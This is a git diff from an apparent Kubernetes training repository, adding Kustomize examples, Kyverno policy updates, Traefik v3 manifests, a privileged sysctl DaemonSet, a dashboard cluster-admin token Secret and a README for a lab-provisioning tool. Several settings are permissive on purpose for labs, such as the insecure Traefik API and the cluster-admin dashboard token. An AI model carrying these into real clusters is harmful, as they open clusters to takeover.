# cluster (including resource-constrained local clusters
|
||||
# like KiND or minikube). The example belows add CPU
|
||||
# requests and limits using a strategic merge patch.
|
||||
# The patch is inlined here, but it could also be put
|
||||
# in a file and referenced with "path: xxxxxx.yaml".
|
||||
- patch: |
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: ollama
|
||||
spec:
|
||||
template:
|
||||
spec:
|
||||
containers:
|
||||
- name: ollama
|
||||
resources:
|
||||
requests:
|
||||
cpu: 1
|
||||
limits:
|
||||
cpu: 2
|
||||
# This will have the same effect, with one little detail:
|
||||
# JSON patches cannot specify containers by name, so this
|
||||
# assumes that the ollama container is the first one in
|
||||
# the pod template (whereas the strategic merge patch can
|
||||
# use "merge keys" and identify containers by their name).
|
||||
#- target:
|
||||
# kind: Deployment
|
||||
# name: ollama
|
||||
# patch: |
|
||||
# - op: add
|
||||
# path: /spec/template/spec/containers/0/resources
|
||||
# value:
|
||||
# requests:
|
||||
# cpu: 1
|
||||
# limits:
|
||||
# cpu: 2
|
||||
|
||||
# A "component" is a bit like a "base", in the sense that
|
||||
# it lets us define some reusable resources and behaviors.
|
||||
# There is a key different, though:
|
||||
# - a "base" will be evaluated in isolation: it will
|
||||
# generate+transform some resources, then these resources
|
||||
# will be included in the main Kustomization;
|
||||
# - a "component" has access to all the resources that
|
||||
# have been generated by the main Kustomization, which
|
||||
# means that it can transform them (with patches etc).
|
||||
components:
|
||||
- add-haproxy-sidecar
|
||||
73
k8s/kustomize-examples/ollama-with-sidecar/ollama.yaml
Normal file
73
k8s/kustomize-examples/ollama-with-sidecar/ollama.yaml
Normal file
@@ -0,0 +1,73 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: ollama
|
||||
name: ollama
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: ollama
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: ollama
|
||||
spec:
|
||||
volumes:
|
||||
- name: ollama
|
||||
hostPath:
|
||||
path: /opt/ollama
|
||||
type: DirectoryOrCreate
|
||||
containers:
|
||||
- image: ollama/ollama
|
||||
name: ollama
|
||||
env:
|
||||
- name: OLLAMA_MAX_QUEUE
|
||||
valueFrom:
|
||||
configMapKeyRef:
|
||||
name: ollama
|
||||
key: queue
|
||||
- name: MODEL
|
||||
valueFrom:
|
||||
configMapKeyRef:
|
||||
name: ollama
|
||||
key: model
|
||||
volumeMounts:
|
||||
- name: ollama
|
||||
mountPath: /root/.ollama
|
||||
lifecycle:
|
||||
postStart:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- ollama pull $MODEL
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
port: 11434
|
||||
readinessProbe:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- ollama show $MODEL
|
||||
ports:
|
||||
- name: ollama
|
||||
containerPort: 11434
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: ollama
|
||||
name: ollama
|
||||
spec:
|
||||
ports:
|
||||
- name: "11434"
|
||||
port: 11434
|
||||
protocol: TCP
|
||||
targetPort: 11434
|
||||
selector:
|
||||
app: ollama
|
||||
type: ClusterIP
|
||||
@@ -0,0 +1,5 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
resources:
|
||||
- microservices
|
||||
- redis
|
||||
@@ -0,0 +1,13 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
resources:
|
||||
- microservices.yaml
|
||||
transformers:
|
||||
- |
|
||||
apiVersion: builtin
|
||||
kind: PrefixSuffixTransformer
|
||||
metadata:
|
||||
name: use-ghcr-io
|
||||
prefix: ghcr.io/
|
||||
fieldSpecs:
|
||||
- path: spec/template/spec/containers/image
|
||||
@@ -0,0 +1,125 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hasher
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/hasher:v0.1
|
||||
name: hasher
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: hasher
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: rng
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/rng:v0.1
|
||||
name: rng
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: rng
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/webui:v0.1
|
||||
name: webui
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: webui
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
name: worker
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: worker
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/worker:v0.1
|
||||
name: worker
|
||||
@@ -0,0 +1,4 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
resources:
|
||||
- redis.yaml
|
||||
@@ -0,0 +1,35 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
@@ -0,0 +1,160 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hasher
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/hasher:v0.1
|
||||
name: hasher
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: hasher
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: rng
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/rng:v0.1
|
||||
name: rng
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: rng
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/webui:v0.1
|
||||
name: webui
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: webui
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
name: worker
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: worker
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/worker:v0.1
|
||||
name: worker
|
||||
@@ -0,0 +1,30 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
resources:
|
||||
- dockercoins.yaml
|
||||
replacements:
|
||||
- sourceValue: ghcr.io/dockercoins
|
||||
targets:
|
||||
- select:
|
||||
kind: Deployment
|
||||
labelSelector: "app in (hasher,rng,webui,worker)"
|
||||
# It will soon be possible to use regexes in replacement selectors,
|
||||
# meaning that the "labelSelector:" above can be replaced with the
|
||||
# following "name:" selector which is a tiny bit simpler:
|
||||
#name: hasher|rng|webui|worker
|
||||
# Regex support in replacement selectors was added by this PR:
|
||||
# https://github.com/kubernetes-sigs/kustomize/pull/5863
|
||||
# This PR was merged in August 2025, but as of October 2025, the
|
||||
# latest release of Kustomize is 5.7.1, which was released in July.
|
||||
# Hopefully the feature will be available in the next release :)
|
||||
# Another possibility would be to select all Deployments, and then
|
||||
# reject the one(s) for which we don't want to update the registry;
|
||||
# for instance:
|
||||
#reject:
|
||||
# kind: Deployment
|
||||
# name: redis
|
||||
fieldPaths:
|
||||
- spec.template.spec.containers.*.image
|
||||
options:
|
||||
delimiter: "/"
|
||||
index: 0
|
||||
@@ -3,7 +3,6 @@ kind: ClusterPolicy
|
||||
metadata:
|
||||
name: pod-color-policy-1
|
||||
spec:
|
||||
validationFailureAction: enforce
|
||||
rules:
|
||||
- name: ensure-pod-color-is-valid
|
||||
match:
|
||||
@@ -18,5 +17,6 @@ spec:
|
||||
operator: NotIn
|
||||
values: [ red, green, blue ]
|
||||
validate:
|
||||
failureAction: Enforce
|
||||
message: "If it exists, the label color must be red, green, or blue."
|
||||
deny: {}
|
||||
|
||||
@@ -3,7 +3,6 @@ kind: ClusterPolicy
|
||||
metadata:
|
||||
name: pod-color-policy-2
|
||||
spec:
|
||||
validationFailureAction: enforce
|
||||
background: false
|
||||
rules:
|
||||
- name: prevent-color-change
|
||||
@@ -15,13 +14,14 @@ spec:
|
||||
- key: "{{ request.operation }}"
|
||||
operator: Equals
|
||||
value: UPDATE
|
||||
- key: "{{ request.oldObject.metadata.labels.color }}"
|
||||
- key: "{{ request.oldObject.metadata.labels.color || '' }}"
|
||||
operator: NotEquals
|
||||
value: ""
|
||||
- key: "{{ request.object.metadata.labels.color }}"
|
||||
- key: "{{ request.object.metadata.labels.color || '' }}"
|
||||
operator: NotEquals
|
||||
value: ""
|
||||
validate:
|
||||
failureAction: Enforce
|
||||
message: "Once label color has been added, it cannot be changed."
|
||||
deny:
|
||||
conditions:
|
||||
|
||||
@@ -3,7 +3,6 @@ kind: ClusterPolicy
|
||||
metadata:
|
||||
name: pod-color-policy-3
|
||||
spec:
|
||||
validationFailureAction: enforce
|
||||
background: false
|
||||
rules:
|
||||
- name: prevent-color-change
|
||||
@@ -15,14 +14,13 @@ spec:
|
||||
- key: "{{ request.operation }}"
|
||||
operator: Equals
|
||||
value: UPDATE
|
||||
- key: "{{ request.oldObject.metadata.labels.color }}"
|
||||
- key: "{{ request.oldObject.metadata.labels.color || '' }}"
|
||||
operator: NotEquals
|
||||
value: ""
|
||||
- key: "{{ request.object.metadata.labels.color }}"
|
||||
- key: "{{ request.object.metadata.labels.color || '' }}"
|
||||
operator: Equals
|
||||
value: ""
|
||||
validate:
|
||||
failureAction: Enforce
|
||||
message: "Once label color has been added, it cannot be removed."
|
||||
deny:
|
||||
conditions:
|
||||
|
||||
deny: {}
|
||||
|
||||
13
k8s/pod-disruption-budget.yaml
Normal file
13
k8s/pod-disruption-budget.yaml
Normal file
@@ -0,0 +1,13 @@
|
||||
apiVersion: policy/v1
|
||||
kind: PodDisruptionBudget
|
||||
metadata:
|
||||
name: my-pdb
|
||||
spec:
|
||||
#minAvailable: 2
|
||||
#minAvailable: 90%
|
||||
maxUnavailable: 1
|
||||
#maxUnavailable: 10%
|
||||
selector:
|
||||
matchLabels:
|
||||
app: my-app
|
||||
|
||||
27
k8s/sysctl.yaml
Normal file
27
k8s/sysctl.yaml
Normal file
@@ -0,0 +1,27 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: sysctl
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: sysctl
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: sysctl
|
||||
spec:
|
||||
tolerations:
|
||||
- operator: Exists
|
||||
initContainers:
|
||||
- name: sysctl
|
||||
image: alpine
|
||||
securityContext:
|
||||
privileged: true
|
||||
command:
|
||||
- sysctl
|
||||
- fs.inotify.max_user_instances=99999
|
||||
containers:
|
||||
- name: pause
|
||||
image: registry.k8s.io/pause:3.8
|
||||
|
||||
@@ -1,87 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik:1.7
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --api
|
||||
- --kubernetes
|
||||
- --logLevel=INFO
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
@@ -1,114 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik:v2.5
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: https
|
||||
containerPort: 443
|
||||
hostPort: 443
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --accesslog
|
||||
- --api
|
||||
- --api.insecure
|
||||
- --log.level=INFO
|
||||
- --metrics.prometheus
|
||||
- --providers.kubernetesingress
|
||||
- --entrypoints.http.Address=:80
|
||||
- --entrypoints.https.Address=:443
|
||||
- --entrypoints.https.http.tls.certResolver=default
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- networking.k8s.io
|
||||
resources:
|
||||
- ingresses
|
||||
- ingressclasses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: IngressClass
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik
|
||||
annotations:
|
||||
ingressclass.kubernetes.io/is-default-class: "true"
|
||||
spec:
|
||||
controller: traefik.io/ingress-controller
|
||||
@@ -1 +0,0 @@
|
||||
traefik-v2.yaml
|
||||
123
k8s/traefik.yaml
Normal file
123
k8s/traefik.yaml
Normal file
@@ -0,0 +1,123 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: traefik
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik
|
||||
namespace: traefik
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik
|
||||
namespace: traefik
|
||||
labels:
|
||||
app: traefik
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: traefik
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: traefik
|
||||
name: traefik
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
# If, for some reason, our CNI plugin doesn't support hostPort,
|
||||
# we can enable hostNetwork instead. That should work everywhere
|
||||
# but it doesn't provide the same isolation.
|
||||
#hostNetwork: true
|
||||
serviceAccountName: traefik
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik:v3.5
|
||||
name: traefik
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: https
|
||||
containerPort: 443
|
||||
hostPort: 443
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --accesslog
|
||||
- --api
|
||||
- --api.insecure
|
||||
- --entrypoints.http.Address=:80
|
||||
- --entrypoints.https.Address=:443
|
||||
- --global.sendAnonymousUsage=true
|
||||
- --log.level=INFO
|
||||
- --metrics.prometheus
|
||||
- --providers.kubernetesingress
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
- nodes
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- networking.k8s.io
|
||||
resources:
|
||||
- ingresses
|
||||
- ingressclasses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- discovery.k8s.io
|
||||
resources:
|
||||
- endpointslices
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik
|
||||
namespace: traefik
|
||||
---
|
||||
kind: IngressClass
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik
|
||||
annotations:
|
||||
ingressclass.kubernetes.io/is-default-class: "true"
|
||||
spec:
|
||||
controller: traefik.io/ingress-controller
|
||||
@@ -70,4 +70,15 @@ add_namespace() {
|
||||
kubectl create serviceaccount -n kubernetes-dashboard cluster-admin \
|
||||
-o yaml --dry-run=client \
|
||||
#
|
||||
echo ---
|
||||
cat <<EOF
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
type: kubernetes.io/service-account-token
|
||||
metadata:
|
||||
name: cluster-admin-token
|
||||
namespace: kubernetes-dashboard
|
||||
annotations:
|
||||
kubernetes.io/service-account.name: cluster-admin
|
||||
EOF
|
||||
) > dashboard-with-token.yaml
|
||||
|
||||
@@ -2,4 +2,3 @@
|
||||
base = "slides"
|
||||
publish = "slides"
|
||||
command = "./build.sh once"
|
||||
|
||||
|
||||
222
prepare-labs/README.md
Normal file
222
prepare-labs/README.md
Normal file
@@ -0,0 +1,222 @@
|
||||
# Tools to create lab environments
|
||||
|
||||
This directory contains tools to create lab environments for Docker and Kubernetes courses and workshops.
|
||||
|
||||
It also contains Terraform configurations that can be used stand-alone to create simple Kubernetes clusters.
|
||||
|
||||
Assuming that you have installed all the necessary dependencies, and placed cloud provider access tokens in the right locations, you could do, for instance:
|
||||
|
||||
```bash
|
||||
# For a Docker course with 50 students,
|
||||
# create 50 VMs on Digital Ocean.
|
||||
./labctl create --students 50 --settings settings/docker.env --provider digitalocean
|
||||
|
||||
# For a Kubernetes training with 20 students,
|
||||
# create 20 clusters of 4 VMs each using kubeadm,
|
||||
# on a private Openstack cluster.
|
||||
./labctl create --students 20 --settings settings/kubernetes.env --provider openstack/enix
|
||||
|
||||
# For a Kubernetes workshop with 80 students,
|
||||
# create 80 clusters with 2 VMs each,
|
||||
# using Scaleway Kapsule (managed Kubernetes).
|
||||
./labctl create --students 20 --settings settings/mk8s.env --provider scaleway --mode mk8s
|
||||
```
|
||||
|
||||
Interested? Read on!
|
||||
|
||||
## Software requirements
|
||||
|
||||
For Docker labs and Kubernetes labs based on kubeadm:
|
||||
|
||||
- [Parallel SSH](https://github.com/lilydjwg/pssh)
|
||||
(should be installable with `pip install git+https://github.com/lilydjwg/pssh`;
|
||||
on a Mac, try `brew install pssh`)
|
||||
|
||||
For all labs:
|
||||
|
||||
- Terraform
|
||||
|
||||
If you want to generate printable cards:
|
||||
|
||||
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
|
||||
- [jinja2](https://pypi.python.org/pypi/Jinja2)
|
||||
|
||||
These require Python 3. If you are on a Mac, see below for specific instructions on setting up
|
||||
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
|
||||
may have changed your default Python to Python 2.
|
||||
|
||||
You will also need an account with the cloud provider(s) that you want to use to deploy the lab environments.
|
||||
|
||||
## Cloud provider account(s) and credentials
|
||||
|
||||
These scripts create VMs or Kubernetes cluster on cloud providers, so you will need cloud provider account(s) and credentials.
|
||||
|
||||
Generally, we try to use the credentials stored in the configuration file used by the cloud providers CLI tools.
|
||||
|
||||
This means, for instance, that for Linode, if you install `linode-cli` and configure it properly, it will place your credentials in `~/.config/linode-cli`, and our Terraform configurations will try to read that file and use the credentials in it.
|
||||
|
||||
You don't **have to** install the CLI tools of the cloud provider(s) that you want to use; but we recommend that you do.
|
||||
|
||||
If you want to provide your cloud credentials through other means, you will have to adjust the Terraform configuration files in `terraform/provider-config` accordingly.
|
||||
|
||||
Here is where we look for credentials for each provider:
|
||||
|
||||
- AWS: Terraform defaults; see [AWS provider documentation][creds-aws] (for instance, you can use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` environment variables, or AWS config and profile files)
|
||||
- Azure: Terraform defaults; see [AzureRM provider documentation][creds-azure] (typically, you can authenticate with the `az` CLI and Terraform will pick it up automatically)
|
||||
- Civo: CLI configuration file (`~/.civo.json`)
|
||||
- Digital Ocean: CLI configuration file (`~/.config/doctl/config.yaml`)
|
||||
- Exoscale: CLI configuration file (`~/.config/exoscale/exoscale.toml`)
|
||||
- Google Cloud: we're using "Application Default Credentials (ADC)"; run `gcloud auth application-default login`; note that we'll use the default "project" set in `gcloud` unless you set the `GOOGLE_PROJECT` environment variable
|
||||
- Hetzner: CLI configuration file (`~/.config/hcloud/cli.toml`)
|
||||
- Linode: CLI configuration file (`~/.config/linode-cli`)
|
||||
- OpenStack: you will need to write a tfvars file (check [that exemple](terraform/virtual-machines/openstack/tfvars.example))
|
||||
- Oracle: Terraform defaults; see [OCI provider documentation][creds-oci] (for instance, you can set up API keys; or you can use a short-lived token generated by the OCI CLI with `oci session authenticate`)
|
||||
- OVH: Terraform defaults; see [OVH provider documentation][creds-ovh] (this typically involves setting up 5 `OVH_...` environment variables)
|
||||
- Scaleway: Terraform defaults; see [Scaleway provider documentation][creds-scw] (for instance, you can set environment variables, but it will also automatically pick up CLI authentication from `~/.config/scw/config.yaml`)
|
||||
|
||||
[creds-aws]: https://registry.terraform.io/providers/hashicorp/aws/latest/docs#authentication-and-configuration
|
||||
[creds-azure]: https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs#authenticating-to-azure
|
||||
[creds-oci]: https://docs.oracle.com/en-us/iaas/Content/API/SDKDocs/terraformproviderconfiguration.htm#authentication
|
||||
[creds-ovh]: https://registry.terraform.io/providers/ovh/ovh/latest/docs#provider-configuration
|
||||
[creds-scw]: https://registry.terraform.io/providers/scaleway/scaleway/latest/docs#authentication
|
||||
|
||||
## General Workflow
|
||||
|
||||
- fork/clone repo
|
||||
- make sure your cloud credentials have been configured properly
|
||||
- run `./labctl create ...` to create lab environments
|
